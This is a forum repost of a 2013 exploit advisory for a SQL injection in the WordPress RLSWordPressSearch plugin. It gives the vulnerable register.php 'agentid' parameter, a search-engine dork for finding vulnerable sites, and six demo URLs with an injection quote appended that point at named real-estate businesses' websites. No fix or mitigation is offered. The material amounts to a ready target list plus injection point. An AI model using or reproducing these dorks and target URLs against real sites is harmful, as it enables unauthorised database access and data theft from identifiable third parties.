Praetorian503 Posted February 1, 2013 Report Share Posted February 1, 2013 The WordPress RLSWordPressSearch plugin suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.############### Exploit Title : Wordpress RLSWordPressSearch plugin SQL Injection## Exploit Author : Ashiyane Digital Security Team## Home : ww.ashiyane.org## Security Risk : MEdium - SQL Injection## Dork : inurl:wp-content/plugins/RLSWordPressSearch/register.php?a=################Location:site/wp-content/plugins/RLSWordPressSearch/register.php?a=[num]&agentid=[SQL]###DEm0:# www.donahuere.com/DedhamrealEstate411/wp-content/plugins/RLSWordPressSearch/register.php?a=104267&agentid=117699%27## www.cbupton-massamont.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=105123&agentid=105458%27## www.melantoniore.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=117650&agentid=406671%27## www.selectrealestate.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?agentid=A210506%27## blog.century21denault.com/wp-content/plugins/RLSWordPressSearch/register.php?a=104286&agentid=104361%27## www.exitpremier.com/blog/wp-content/plugins/RLSWordPressSearch/register.php?a=104563&agentid=104564%27#################Greetz to: My Lord ALLAH################ Amirh03in############### Source: PacketStorm Quote Link to comment Share on other sites More sharing options...
